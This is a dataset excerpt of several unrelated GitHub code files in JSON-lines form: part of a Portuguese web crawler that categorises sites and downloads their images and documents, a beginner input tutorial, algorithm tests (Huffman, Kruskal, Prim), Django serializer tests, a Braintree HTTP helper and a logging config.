(1)\n\t\t\tretorno.append(0) #Quantidade de palavras mais encontrada (2)\n\t\t\tretorno.append(\"\") #Palavra mais encontrada (2)\n\t\t\tretorno.append(0) #Quantidade de palavras mais encontrada (3)\n\t\t\tretorno.append(\"\") #Palavra mais encontrada (3)\n\t\t\t\n\t\t\tfor metas in soup.find_all('meta'):\n\t\t\t\tmeta = metas.get('name')\n\t\t\t\tif meta == \"keywords\":\n\t\t\t\t\tmeta_keywords_encontrado = True\n\t\t\t\t\tkeywords = metas.get('content')\n\t\t\t\t\tretorno[0] = \"Meta Tags\"\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\tif retorno[0] == \"\":\n\t\t\t\tretorno[0] = \"Palavras-chaves\"\n\t\t\t\t\n\t\t\tfor categoria in lista_categorias:\n\t\t\t\tfor palavras_chaves in categoria[2]:\n\t\t\t\t\tquant = 0\n\t\t\t\t\t\n\t\t\t\t\tif meta_keywords_encontrado == True:\n\t\t\t\t\t\tquant = keywords.count(palavras_chaves)\n\t\t\t\t\telse:\n\t\t\t\t\t\tquant = texto_html.count(palavras_chaves)\n\t\t\t\t\tcategoria[1] += quant\n\t\t\t\t\n\t\t\t\t\tif quant > retorno[7]:\n\t\t\t\t\t\tif retorno[9] >= retorno[11]:\n\t\t\t\t\t\t\tretorno[11] = retorno[9]\n\t\t\t\t\t\t\tretorno[12] = retorno[10]\n\t\t\t\t\t\tif retorno[7] >= retorno[9]:\n\t\t\t\t\t\t\tretorno[9] = retorno[7]\n\t\t\t\t\t\t\tretorno[10] = retorno[8]\n\t\t\t\t\t\tretorno[7] = quant\n\t\t\t\t\t\tretorno[8] = palavras_chaves\n\t\t\t\t\telif meta_keywords_encontrado == True:\n\t\t\t\t\t\tif keywords.count(palavras_chaves) > retorno[9]:\n\t\t\t\t\t\t\tif retorno[9] >= retorno[11]:\n\t\t\t\t\t\t\t\tretorno[11] = retorno[9]\n\t\t\t\t\t\t\t\tretorno[12] = retorno[10]\n\t\t\t\t\t\t\tretorno[9] = quant\n\t\t\t\t\t\t\tretorno[10] = palavras_chaves\n\t\t\t\t\t\telif keywords.count(palavras_chaves) > retorno[11]:\n\t\t\t\t\t\t\tretorno[11] = quant\n\t\t\t\t\t\t\tretorno[12] = palavras_chaves\n\t\t\t\t\telse:\n\t\t\t\t\t\tif texto_html.count(palavras_chaves) > retorno[9]:\n\t\t\t\t\t\t\tif retorno[9] >= retorno[11]:\n\t\t\t\t\t\t\t\tretorno[11] = retorno[9]\n\t\t\t\t\t\t\t\tretorno[12] = retorno[10]\n\t\t\t\t\t\t\tretorno[9] = quant\n\t\t\t\t\t\t\tretorno[10] = palavras_chaves\n\t\t\t\t\t\telif texto_html.count(palavras_chaves) > retorno[11]:\n\t\t\t\t\t\t\tretorno[11] = quant\n\t\t\t\t\t\t\tretorno[12] = palavras_chaves\n\t\t\t\t\n\t\t\t\t#Verifica se ha outra categoria anterior com uma quantidade maior de palavras chaves encontradas\n\t\t\t\tif categoria[1] > quantidade_1:\n\t\t\t\t\tif retorno[3] >= retorno[5]:\n\t\t\t\t\t\tretorno[5] = retorno[3]\n\t\t\t\t\t\tretorno[6] = retorno[4]\n\t\t\t\t\tif retorno[1] >= retorno[3]:\n\t\t\t\t\t\tretorno[3] = retorno[1]\n\t\t\t\t\t\tretorno[4] = retorno[2]\n\t\t\t\t\tretorno[1] = categoria[1]\n\t\t\t\t\tretorno[2] = categoria[0]\n\t\t\t\telif categoria[1] > quantidade_2:\n\t\t\t\t\tif retorno[3] >= retorno[5]:\n\t\t\t\t\t\tretorno[5] = retorno[3]\n\t\t\t\t\t\tretorno[6] = retorno[4]\n\t\t\t\t\tretorno[3] = categoria[1]\n\t\t\t\t\tretorno[4] = categoria[0]\n\t\t\t\telif categoria[1] > quantidade_3:\n\t\t\t\t\tretorno[5] = categoria[1]\n\t\t\t\t\tretorno[6] = categoria[0]\n\t\t\t\t\t\n\t\t\treturn retorno\n\t\t\t\n\t\tdef classificaLink(links, dominio, url, lista_categorias):\n\t\t\tvalidado = False\n\t\t\tlink_interno = False\n\t\t\tlink_retorno = \"\"\n\t\t\tcategoria = ''\n\t\t\t# Obtem o \"href\" dos links\n\t\t\tlink = links.get('href')\n\t\t\t# Verifica se o valor de link e nulo\n\t\t\tif link is not None:\n\t\t\t\t# Retira os espacos em branco antes e depois do link\n\t\t\t\tlink = link.strip()\n\t\t\t\tif link.count(dominio) > 0:\n\t\t\t\t\tif link[:7] == \"http://\" or link[:8] == \"https://\":\n\t\t\t\t\t\tif link.find(dominio) < 15:\n\t\t\t\t\t\t\tlink_interno = True\n\t\t\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t\t\t#link_site.append(link)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t\t\t#link_externo.append(link)\n\t\t\t\t\telse:\n\t\t\t\t\t\taux = trataUrlLink(url, link)\n\t\t\t\t\t\t#Verifica se com a URL, e possivel chegar a um caminho acessivel\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\turllib.request.urlopen(aux)\n\t\t\t\t\t\t\trequest = urllib.request.urlopen(link_retorno)\n\t\t\t\t\t\t\thtml = request.read()\n\t\t\t\t\t\t\thtml = html.decode(\"utf-8\", \"ignore\")\n\t\t\t\t\t\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\t\t\t\t\t\tsoup = BeautifulSoup(html)\n\t\t\t\t\t\t\tcategoria = categorizarPagina(soup, lista_categorias)\n\t\t\t\t\t\t\tvalidado = True\n\t\t\t\t\t\t#Caso nao seja possivel, utiliza o dominio para montar a URL\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\taux = trataUrlLink(\"http://\" + dominio, link)\n\t\t\t\t\t\tif aux != \"\":\n\t\t\t\t\t\t\tlink_interno = True\n\t\t\t\t\t\t\tlink_retorno = aux\n\t\t\t\t\t\t\t#link_site.append(aux)\n\t\t\t\telif link.count(url) > 0:\n\t\t\t\t\tlink_interno = True\n\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t#link_site.append(link)\n\t\t\t\telif link[:7] == \"http://\" or link[:8] == \"https://\":\n\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t#link_externo.append(link)\n\t\t\t\telse:\n\t\t\t\t\taux = trataUrlLink(url, link)\n\t\t\t\t\t#Verifica se com a URL, e possivel chegar a um caminho acessivel\n\t\t\t\t\ttry:\n\t\t\t\t\t\turllib.request.urlopen(aux)\n\t\t\t\t\t\trequest = urllib.request.urlopen(link_retorno)\n\t\t\t\t\t\thtml = request.read()\n\t\t\t\t\t\thtml = html.decode(\"utf-8\", \"ignore\")\n\t\t\t\t\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\t\t\t\t\tsoup = BeautifulSoup(html)\n\t\t\t\t\t\tcategoria = categorizarPagina(soup, lista_categorias)\n\t\t\t\t\t\tvalidado = True\n\t\t\t\t\t#Caso nao seja possivel, utiliza o dominio para montar a URL\n\t\t\t\t\texcept:\n\t\t\t\t\t\taux = trataUrlLink(\"http://\" + dominio, link)\n\t\t\t\t\tif aux != \"\":\n\t\t\t\t\t\tlink_interno = True\n\t\t\t\t\t\tlink_retorno = aux\n\t\t\t\t\t\t#link_site.append(aux)\n\t\t\t\n\t\t\t#Obtem a categoria do link\n\t\t\tif validado == False:\n\t\t\t\ttry:\n\t\t\t\t\trequest = urllib.request.urlopen(link_retorno)\n\t\t\t\t\thtml = request.read()\n\t\t\t\t\thtml = html.decode(\"utf-8\", \"ignore\")\n\t\t\t\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\t\t\t\tsoup = BeautifulSoup(html)\n\t\t\t\t\tcategoria = categorizarPagina(soup, lista_categorias)\n\t\t\t\t\tvalidado = True\n\t\t\t\texcept:\n\t\t\t\t\treturn ['']\n\t\t\t\n\t\t\tretorno = []\n\t\t\tretorno.append(link_retorno)\n\t\t\tretorno.append(link_interno)\n\t\t\tretorno.append(categoria[2])\n\t\t\treturn retorno\n\t\t\t\n\t\tcaminho_projeto = \"c:/py/pi4/\"\n\t\tcaminho_projeto_fotos = caminho_projeto + \"imagens_sites/\"\n\t\tcaminho_projeto_documentos = caminho_projeto + \"documentos_sites/\"\n\t\tcaminho_aux_fotos = \"imagens_sites/\"\n\t\tcaminho_aux_documentos = \"documentos_sites/\"\n\t\tpasta_site = \"\"\n\t\t\n\t\tdiretorio_inicial = \"\"\n\t\t\n\t\thtml = \"\"\n\t\thtml_site = \"\"\n\t\thtml_categoria = \"\"\n\t\thtml_metodo = \"\"\n\t\thtml_data_inicio = \"\"\n\t\thtml_data_fim = \"\"\n\t\thtml_link_internos = \"\"\n\t\thtml_link_externos = \"\"\n\t\thtml_palavras = \"\"\n\n\t\ttexto_log_erros = \"\"\n\t\ttexto_links = \"\"\n\t\t\t\n\t\t#URL do site\n\t\turl = hdnTxtPesquisa.strip()\n\t\t#Dominio extraido da URL do site (usado na classificacao de links)\n\t\tdominio = \"\"\n\t\t#Arquivo de erros\n\t\tarquivo_erros = 'log.txt'\n\t\t#Arquivo de links\n\t\tarquivo_links = 'links.txt'\n\t\t#Arquivo de conclusao\n\t\tarquivo_fim = 'fim.txt'\n\t\t#Arquivo contendo as categorias e palavras chaves\n\t\tarquivo_conf = caminho_projeto + 'crawler.conf'\n\n\t\t#Variavel que indica que o site possui meta tags com Keywords da pagina\n\t\tmeta_keywords_encontrado = False\t\n\t\t#Variavel que armazenara as keywords do site caso ele possua\n\t\tkeywords = \"\"\n\n\t\t#Variavel que armazena a quantidade de palavras chaves encontradas\n\t\tquantidade_final = 0\n\t\t#O nome da categoria que teve mais palavras chaves presentes no html\n\t\tcategoria_final = \"\"\n\n\t\t#Variavel que ira armazenar o HTML da pagina\n\t\thtml = \"\"\n\t\t#Variavel que ira armazenar o texto do HTML da pagina\n\t\ttexto_html = \"\"\n\t\t#Lista com os links internos encontrados no site\n\t\tlink_site = []\n\t\t#Lista com os links externos encontrados no site\n\t\tlink_externo = []\n\t\t#Lista com os caminhos de imagens\n\t\tcaminhos_imagens = \"\"\n\t\t#Lista com os caminhos dos arquivos\n\t\tcaminhos_arquivos = \"\"\n\t\t\n\t\tdiretorio_inicial = url\n\t\t\n\t\ttry:\n\t\t\t#Extrai todo o HTML da pagina\n\t\t\trequest = urllib.request.urlopen(url)\n\t\t\t\n\t\t\twhile url != request.geturl():\n\t\t\t\turl = request.geturl()\n\t\t\t\trequest = urllib.request.urlopen(url)\n\t\t\t\n\t\t\thtml = request.read()\n\t\t\thtml = html.decode(\"utf-8\", \"ignore\").lower()\n\t\texcept:\n\t\t\t#RETORNO DE ERRO\n\t\t\treturn \"0\"\n\t\t\n\t\tcaminho_projeto = caminho_projeto + \"sites/\"\n\t\t\n\t\t#Encontra o dominio do site pela url digitada\n\t\tdominio = url.replace(\"http://www.\", \"\").replace(\"https://www.\", \"\").replace(\"/\", \"@\").replace(\"http://\", \"\").replace(\"https://\", \"\")\n\t\tif dominio.find(\"@\") != -1:\n\t\t\tdominio = dominio[:dominio.find(\"@\")]\n\t\t\n\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\tsoup = BeautifulSoup(html)\n\t\t#Pega todo o texto da pagina\n\t\ttexto_html = soup.get_text()\n\t\t\n\t\tpasta_site = diretorio_inicial.replace(\"http://\", \"\").replace(\"/\", \"_\") + \"/\"\n\t\n\t\tcaminho_projeto = caminho_projeto + pasta_site\n\t\tarquivo_erros = caminho_projeto + arquivo_erros\n\t\tarquivo_links = caminho_projeto + arquivo_links\n\t\t\n\t\tif os.path.isfile(caminho_projeto + arquivo_fim):\n\t\t\tarq = open(caminho_projeto + arquivo_fim, 'r')\n\t\t\tretorno = arq.read()\n\t\t\tarq.close()\n\t\t\t#RETORNO CRAWLER JÁ FEITO\n\t\t\treturn retorno\n\t\t\n\t\tlista_categorias = leituraConf(arquivo_conf)\n\t\t\n\t\tif not os.path.isdir(caminho_projeto):\n\t\t\tos.mkdir(caminho_projeto)\n\n\t\thtml_site = url\n\t\thtml_data_inicio = strftime(\"%d/%m/%Y %H:%M:%S\")\n\n\t\t# ------ CATEGORIZAÇÃO DO SITE ------\n\t\tretorno = categorizarPagina(soup, lista_categorias)\n\n\t\thtml_metodo = retorno[0]\n\t\t\n\t\tcategoria_quant_1 = retorno[1]\n\t\tcategoria_1 = retorno[2]\n\t\tcategoria_quant_2 = retorno[3]\n\t\tcategoria_2 = retorno[4]\n\t\tcategoria_quant_3 = retorno[5]\n\t\tcategoria_3 = retorno[6]\n\t\t\n\t\tif categoria_quant_1 > 0 and categoria_quant_2 > 0 and categoria_quant_3 > 0:\n\t\t\tcategoria_quant_total = int(categoria_quant_1) + int(categoria_quant_2) + int(categoria_quant_3)\n\t\t\t\n\t\t\tperc_1 = int(categoria_quant_1) / int(categoria_quant_total) * 100\n\t\t\tperc_2 = int(categoria_quant_2) / int(categoria_quant_total) * 100\n\t\t\tperc_3 = int(categoria_quant_3) / int(categoria_quant_total) * 100\n\t\t\t\n\t\t\tpalavra_quant_1 = retorno[7]\n\t\t\tpalavra_1 = retorno[8]\n\t\t\tpalavra_quant_2 = retorno[9]\n\t\t\tpalavra_2 = retorno[10]\n\t\t\tpalavra_quant_3 = retorno[11]\n\t\t\tpalavra_3 = retorno[12]\n\t\t\t\n\t\t\thtml_palavras = palavra_1 + \" (\" + str(palavra_quant_1) + \" caso(s))\"\n\t\t\tif palavra_quant_2 > 0:\n\t\t\t\thtml_palavras = html_palavras + \" - \" + palavra_2 + \" (\" + str(palavra_quant_2) + \" caso(s))\"\n\t\t\tif palavra_quant_3 > 0:\n\t\t\t\thtml_palavras = html_palavras + \" - \" + palavra_3 + \" (\" + str(palavra_quant_3) + \" caso(s))\"\n\t\t\t\n\t\t\tif categoria_1 == \"\":\n\t\t\t\thtml_categoria = 'Nao foi possivel classificar o site em uma categoria'\n\t\t\telse:\n\t\t\t\thtml_categoria = categoria_1 + \"(\" + str(perc_1) + \"%)\"\n\t\t\t\t\n\t\t\tif categoria_quant_2 > 0:\n\t\t\t\thtml_categoria = html_categoria + \" - \" + categoria_2 + \"(\" + str(perc_2) + \"%)\"\n\t\t\tif categoria_quant_3 > 0:\n\t\t\t\thtml_categoria = html_categoria + \" - \" + categoria_3 + \"(\" + str(perc_3) + \"%)\"\n\t\telse:\n\t\t\thtml_categoria = 'Nao foi possivel classificar o site em uma categoria'\n\t\t\thtml_palavras = 'Nao foi encontrado palavras-chaves'\n\t\t# -----------------------------------\n\n\t\t# ------ OBTENÇÃO DE LINKS ------\n\t\tcontador = 1\n\t\ttotal_links = len(soup.find_all('a'))\n\t\t\n\t\t#Obtem todos os links do HTML\n\t\tfor links in soup.find_all('a'):\n\t\t\tprint(\"Link \"+str(contador)+\"/\"+str(total_links))\n\t\t\tcontador = contador + 1\n\t\t\t\n\t\t\t# ---- OBTENÇÃO DE DOCUMENTOS -----\n\t\t\tlink = links.get('href')\n\t\t\tif link is not None:\n\t\t\t\tif link[-4:] == \".csv\" or link[-4:] == \".pdf\" or link[-4:] == \".doc\" or link[-4:] == \".zip\" or link[-4:] == \".rar\" or link[-5:] == \".docx\" or link[-4:] == \".xls\" or link[-4:] == \".xlsx\" or link[-3:] == \".7z\":\n\t\t\t\t\tlink = trataUrlLink(\"http://\" + dominio, link)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tfor cont in range(len(link) + 1):\n\t\t\t\t\t\t\tif link[-cont - 1] == \"/\":\n\t\t\t\t\t\t\t\tnome = link[-cont:]\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tlocal = caminho_projeto_documentos + nome\n\t\t\t\t\t\turllib.request.urlretrieve(link, local)\n\t\t\t\t\t\t# Adiciona o documento na lista\n\t\t\t\t\t\tif caminhos_arquivos != \"\":\n\t\t\t\t\t\t\tcaminhos_arquivos = caminhos_arquivos + \"<#>\"\n\t\t\t\t\t\tcaminhos_arquivos = caminhos_arquivos + caminho_aux_documentos + nome + \"<##>\" + nome\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Erro ao baixar arquivo: \" + link + \"\\n\"\n\t\t\t\t# ---------------------------------\n\t\t\t\telse:\n\t\t\t\t\tretorno = classificaLink(links, dominio, diretorio_inicial, lista_categorias)\n\t\t\t\t\tif retorno[0] != \"\":\n\t\t\t\t\t\tif retorno[1] == True:\n\t\t\t\t\t\t\tlink_site.append(retorno[0] + \"<#>\" + retorno[2])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlink_externo.append(retorno[0] + \"<#>\" + retorno[2])\n\t\t# -------------------------------\n\t\t\n\t\t#Organiza a lista de links encontrados\n\t\tlink_site = trataArray(link_site)\n\t\tlink_externo = trataArray(link_externo)\n\n\t\tlista_links_internos = \"\"\n\t\tfor link in link_site:\n\t\t\tif lista_links_internos != \"\":\n\t\t\t\tlista_links_internos = lista_links_internos + \"<##>\"\n\t\t\tlista_links_internos = lista_links_internos + link\n\t\t\t\n\t\tlista_links_externos = \"\"\n\t\tfor link in link_externo:\n\t\t\tif lista_links_externos != \"\":\n\t\t\t\tlista_links_externos = lista_links_externos + \"<##>\"\n\t\t\tlista_links_externos = lista_links_externos + link\n\t\t\n\t\t# ------ OBTENÇÃO DE IMAGENS ------\n\t\tcontador = 1\n\t\ttotal_imagens = len(soup.find_all('img'))\n\t\tfor imagens in soup.find_all('img'):\n\t\t\tprint(\"Imagem \"+str(contador)+\"/\"+str(total_imagens))\n\t\t\timagem = imagens.get('src')\n\t\t\timagem = trataUrlLink(\"http://\" + dominio, imagem)\n\t\t\textensao = extraiExtensao(imagem)\n\t\t\t\n\t\t\tif extensao.count(\"jpg\") == 0 and extensao.count(\"jpeg\") == 0 and extensao.count(\"bmp\") == 0 and extensao.count(\"gif\") == 0 and extensao.count(\"png\") == 0:\n\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Extens\\xe3o de imagem desconhecida: \" + extensao + \"\\n\"\n\t\t\t\tcontador = contador + 1\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tlocal = caminho_projeto_fotos + numeroImagem() + \".\" + extensao\n\t\t\tif imagem is not None:\n\t\t\t\ttry:\n\t\t\t\t\turllib.request.urlretrieve(imagem, local)\n\t\t\t\texcept:\n\t\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Erro ao baixar imagem: \" + imagem + \"\\n\"\n\t\t\t\t\tcontador = contador + 1\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tobj = os.stat(local)\n\t\t\t\tif obj.st_size < 1024:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tos.remove(local)\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Erro ao remover imagem muito pequena: \" + local + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\t# Adiciona a imagem na lista\n\t\t\t\t\tif caminhos_imagens != \"\":\n\t\t\t\t\t\tcaminhos_imagens = caminhos_imagens + \"<#>\"\n\t\t\t\t\t\t\n\t\t\t\t\tnome = \"\"\n\t\t\t\t\tfor cont in range(len(local) + 1):\n\t\t\t\t\t\tif local[-cont - 1] == \"/\":\n\t\t\t\t\t\t\tnome = local[-cont:]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\tcaminhos_imagens = caminhos_imagens + caminho_aux_fotos + nome\n\t\t\t\tcontador = contador + 1\n\t\t# ---------------------------------\n\t\t\n\t\thtml_data_fim = strftime(\"%d/%m/%Y %H:%M:%S\")\n\t\t\n\t\tretorno = url + \"|\" + html_data_inicio + \"|\" + html_data_fim + \"|\" + html_metodo + \"|\" + html_categoria + \"|\" + lista_links_internos + \"|\" + lista_links_externos + \"|\" + caminhos_imagens + \"|\" + caminhos_arquivos + \"|\" + html_palavras\n\t\t\n\t\tarq = open(caminho_projeto + arquivo_fim, 'w')\n\t\tarq.write(retorno)\n\t\tarq.close()\n\t\t\n\t\treturn retorno\n\tinicio.exposed = True\n\nimport os.path\ntutconf = os.path.join(os.path.dirname(__file__), 'htyhon.conf')\n\nif __name__ == '__main__':\n cherrypy.quickstart(WelcomePage(), config=tutconf)\nelse:\n cherrypy.tree.mount(WelcomePage(), config=tutconf)\n","repo_name":"jepiroupo/PI","sub_path":"SRC/pi4/py/pi4/hython.py","file_name":"hython.py","file_ext":"py","file_size_in_byte":24268,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70066310930","text":"# Follow along from the tutorial - 'Refactor'\n# Fabio Fabrizi\n\n# Read in two numbers and multiply them\n\n\"\"\"\nnum1 = int(input(\"Enter a number \"))\nnum2 = int(input(\"And another \"))\n\nanswer = num1 * num2\n\nprint(f\"answer is {answer}\")\n\"\"\"\n\n# Modified version to catch exceptions\n# But notice how we're duplicating the code\n# Great example to put into a function\n\"\"\"\nnum1 = False\nwhile (num1 == False):\n try:\n num1 = int(input(\"Enter a number \"))\n except ValueError:\n print(\"That was not a number \", end=\"\")\n\nnum2 = False\nwhile (num2 == False):\n try:\n num2 = int(input(\"Enter a number \"))\n except ValueError:\n print(\"That was not a number \", end=\"\")\n\nanswer = num1 * num2\nprint(f\"answer is {answer}\")\n\"\"\"\n\n# Code above put into a function:\n\"\"\"\ndef readNum():\n num = False\n while (num == False):\n try:\n num = int(input(\"Enter a number \"))\n except ValueError:\n print(\"That was not a number \", end=\"\")\n return num\n\nnum1 = readNum()\nnum2 = readNum()\n\nanswer = num1 * num2\nprint(f\"answer is {answer}\")\n\"\"\"\n\n# And improved again\n# See how it's simplified with the use of a message\ndef readNum(message = \"Enter a number: \"):\n num = False\n while (num == False):\n try:\n num = int(input(message))\n except ValueError:\n print(\"That was not a number, \", end=\"\")\n return num\n\nnum1 = readNum()\nnum2 = readNum(\"enter second number: \")\n\nanswer = num1 * num2\nprint(f\"answer is {answer}\")\n","repo_name":"fabiofabrizi/Programming-and-Scripting","sub_path":"labs/week06-Functions/readInNumbers.py","file_name":"readInNumbers.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71892182929","text":"\"\"\"Testing for ch06\"\"\"\n\nimport logging\nimport random\nimport unittest\nfrom heapq import heapify, heappop, heappush\nfrom itertools import count\n\nLOG = logging.getLogger(__name__)\n\n####################################################\ndef huffman_trees(seq, frq):\n \"\"\"huffman encoding, seq, frq are lists\"\"\"\n num = count()\n trees = list(zip(frq, num, seq))\n heapify(trees)\n LOG.info(\"trees: {0}\".format(trees))\n while len(trees) > 1:\n fa, _, a = heappop(trees)\n fb, _, b = heappop(trees)\n n = next(num)\n heappush(trees, (fa + fb, n, [a, b]))\n return trees[0][-1]\n\ndef huffman_codes(tree, prefix=\"\"):\n \"\"\"tree is a list of list representing trees\"\"\"\n if len(tree) == 1:\n yield (tree, prefix)\n return\n for bit, child in zip(\"01\", tree):\n for pair in huffman_codes(child, prefix + bit):\n yield pair\n\ndef huffman_decode(binary, current_tree, root_tree):\n \"\"\"TODO: \"\"\"\n pass\n\n####################################################\n\"\"\"Naive implementation of Kruskall algorithm\"\"\"\ndef naive_find(C, u):\n while C[u] != u: # search the representative\n u = C[u]\n return u\n\ndef naive_union(C, u, v):\n u = naive_find(C, u)\n v = naive_find(C, v) # make v as the representative\n C[u] = v\n\ndef naive_kruskal(G):\n E = [(G[u][v], u, v) for u in G for v in G[u]]\n T = set()\n C = {u:u for u in G}\n for _, u, v in sorted(E):\n if naive_find(C, u) != naive_find(C, v):\n T.add(u, v)\n naive_union(C, u, v)\n return T\n####################################################\n\"\"\"Improved Kruskall algorithm\nthe running time is Theta(mlgn):\n\"\"\"\ndef find(C, u):\n if C[u] != u:\n C[u] = find(C, C[u]) # path compression, a little bit mind bending\n return C[u]\n\ndef union(C, R, u, v):\n u = find(C, u)\n v = find(C, v)\n if R[u] > R[v]: # union by rank\n C[v] = u\n else:\n C[u] = v\n if R[u] == R[v]:\n R[v] += 1\n\ndef kruska(G):\n E = [(G[u][v], u, v) for u in G for v in G[u]]\n T = set()\n C, R = {u:u for u in G}, {u:0 for u in G}\n for _, u, v in sorted(E):\n if find(C, u) != find(C, v):\n T.add(u, v)\n union(C, R, u, v)\n return T\n\n#######################################################\n\"\"\"Prim's algorithm\"\"\"\ndef prim(G, s):\n \"\"\"here to do list is a priority queue based on weight\"\"\"\n P, Q = {}, [(0, None, s)] # here 0 is the waight, None here is the predecessor of s\n while Q:\n _, p, u = heappop(Q)\n if u in P:\n continue\n P[u] = p\n for v, w in G[u].items():\n heappush(Q, (w, u, v)) # hereu is predecessor of v\n return P\n\n\n\n\n\n\nclass Ch07TestSuite(unittest.TestCase):\n \"\"\"Basic test cases.\"\"\"\n\n def test_make_changes(self):\n \"\"\"greedy thinking\"\"\"\n denom = [10000, 5000, 2000, 1000, 500, 200, 100, 50, 25, 10, 5, 1]\n owed = 5632\n payed = []\n result = [5000, 500, 100, 25, 5, 1, 1]\n for d in denom:\n while owed >= d:\n owed -= d\n payed.append(d)\n self.assertEqual(sum(payed), 5632)\n self.assertEqual(payed, result)\n\n def test_huffman_trees(self):\n seq = \"abcdefghi\"\n frq = [4, 5, 6, 9, 11, 12, 15, 16, 20]\n result_trees = [['i', [['a', 'b'], 'e']], [['f', 'g'], [['c', 'd'], 'h']]]\n self.assertEqual(huffman_trees(seq, frq), result_trees)\n result_char_map = dict(huffman_codes(result_trees))\n self.assertEqual(result_char_map['a'], '0100')\n self.assertEqual(result_char_map['b'], '0101')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"chengzh2008/pyAlgo","sub_path":"tests/test_ch07.py","file_name":"test_ch07.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18527764046","text":"from unittest import TestCase\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count, Case, When, Avg\n\nfrom store.models import Book, UserBookRelation\nfrom store.serializers import BookSerializer\n\n\nclass BookSerializerTestCase(TestCase):\n\n def test_serializer_ok(self):\n self.user1 = User.objects.create(username=\"test_username1\", first_name='hikki', last_name='hikigaya')\n self.user2 = User.objects.create(username=\"test_username2\", first_name='adilet', last_name='aidaraliev')\n self.user3 = User.objects.create(username='test_username3', first_name='adi', last_name='adiko')\n\n book1 = Book.objects.create(name='test book 1', price=10, author_name='Author 1')\n book2 = Book.objects.create(name='test book 2', price=20, author_name='Author 2')\n\n UserBookRelation.objects.create(user=self.user1, book=book1, rate=5)\n UserBookRelation.objects.create(user=self.user2, book=book1, rate=5)\n UserBookRelation.objects.create(user=self.user3, book=book1, rate=1)\n\n UserBookRelation.objects.create(user=self.user1, book=book2, rate=5)\n UserBookRelation.objects.create(user=self.user2, book=book2, rate=1)\n UserBookRelation.objects.create(user=self.user3, book=book2, )\n\n books = Book.objects.annotate(\n annotated_likes=Count(Case(When(userbookrelation__like=True, then=1))),\n rating=Avg('userbookrelation__rate')).order_by('id')\n\n data = BookSerializer(books, many=True).data\n\n expected_data = [\n {\n 'id': book1.id,\n 'name': 'test book 1',\n 'price': '10.00',\n 'author_name': 'Author 1',\n 'annotated_likes': 3,\n 'rating': '3.67',\n 'owner_name': 'user1',\n 'readers': [\n\n {\n \"first_name\": \"hikki\",\n \"last_name\": \"hikigaya\"\n }\n ]\n\n },\n {\n 'id': book2.id,\n 'name': 'test book 2',\n 'price': '20.00',\n 'author_name': 'Author 2',\n 'annotated_likes': 2,\n 'rating': '3.00',\n 'owner_name': '2',\n 'readers': [\n {\n \"first_name\": \"adilet\",\n \"last_name\": \"aidaraliev\"\n }\n ]\n }\n ]\n print(data)\n self.assertEqual(expected_data, data)\n","repo_name":"Hikki02/books_store","sub_path":"app/store/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17388301493","text":"import httplib\r\n\r\nclass HttplibStrategy(object):\r\n def __init__(self, config, environment):\r\n self.config = config\r\n self.environment = environment\r\n\r\n def http_do(self, http_verb, path, headers, request_body):\r\n if self.environment.is_ssl:\r\n conn = httplib.HTTPSConnection(self.environment.server, self.environment.port)\r\n else:\r\n conn = httplib.HTTPConnection(self.environment.server, self.environment.port)\r\n\r\n conn.request(http_verb, path, request_body, headers)\r\n response = conn.getresponse()\r\n status = response.status\r\n response_body = response.read()\r\n conn.close()\r\n return [status, response_body]\r\n","repo_name":"quantm/custom_django_oscar","sub_path":"lib/braintree/util/http_strategy/httplib_strategy.py","file_name":"httplib_strategy.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"35382179545","text":"LOG_FILE = 'log.log'\n\nLOGGER = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"root\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\n \"console\",\n \"file\",\n ],\n },\n \"formatters\": {\n \"default\": {\n \"class\": \"logging.Formatter\",\n \"format\": \"%(asctime)s %(name)s %(levelname)s %(message)s\",\n },\n \"json\": {\n \"class\": \"pythonjsonlogger.jsonlogger.JsonFormatter\",\n \"format\": \"%(asctime)s %(name)s %(levelname)s %(message)s\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"default\",\n \"level\": \"DEBUG\",\n },\n \"file\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"INFO\",\n \"filename\": LOG_FILE,\n \"mode\": 